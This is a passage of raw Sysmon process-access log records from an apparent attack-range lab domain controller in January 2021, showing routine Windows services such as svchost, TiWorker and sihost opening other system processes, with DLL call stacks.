\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012497Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.857{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012496Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.857{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012495Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.857{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012494Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.857{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012493Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.638{08A6967A-4288-6000-1100-000000009A01}11921988C:\Windows\system32\svchost.exe{08A6967A-476E-6000-3205-000000009A01}6624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012492Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.451{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012491Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.451{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012490Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.451{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012489Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.451{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012488Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.451{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012487Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.451{08A6967A-4753-6000-0E05-000000009A01}23361952C:\Windows\system32\sihost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+1a0fc|C:\Windows\System32\modernexecserver.dll+1a09f|C:\Windows\System32\modernexecserver.dll+198f6|C:\Windows\System32\modernexecserver.dll+2c9d4|C:\Windows\System32\modernexecserver.dll+35efd|C:\Windows\System32\modernexecserver.dll+4d3a1|C:\Windows\System32\modernexecserver.dll+4d2bf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012486Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.388{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012485Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.388{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012484Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.388{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012483Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.388{08A6967A-4298-6000-2F00-000000009A01}22524764C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bc62|c:\windows\system32\tileobjserver.dll+26db2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000012482Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.388{08A6967A-4298-6000-2F00-000000009A01}22524764C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|c:\windows\system32\tileobjserver.dll+bc0f|c:\windows\system32\tileobjserver.dll+26db2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000012481Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:27.388{08A6967A-4753-6000-0E05-000000009A01}23362216C:\Windows\system32\sihost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+23f30|C:\Windows\System32\modernexecserver.dll+43e70|C:\Windows\System32\modernexecserver.dll+3102d|C:\Windows\System32\modernexecserver.dll+30d24|C:\Windows\System32\modernexecserver.dll+17072|C:\Windows\System32\modernexecserver.dll+1d5d7|C:\Windows\SYSTEM32\ntdll.dll+3a950|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012526Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:28.185{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012525Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:28.170{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012524Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 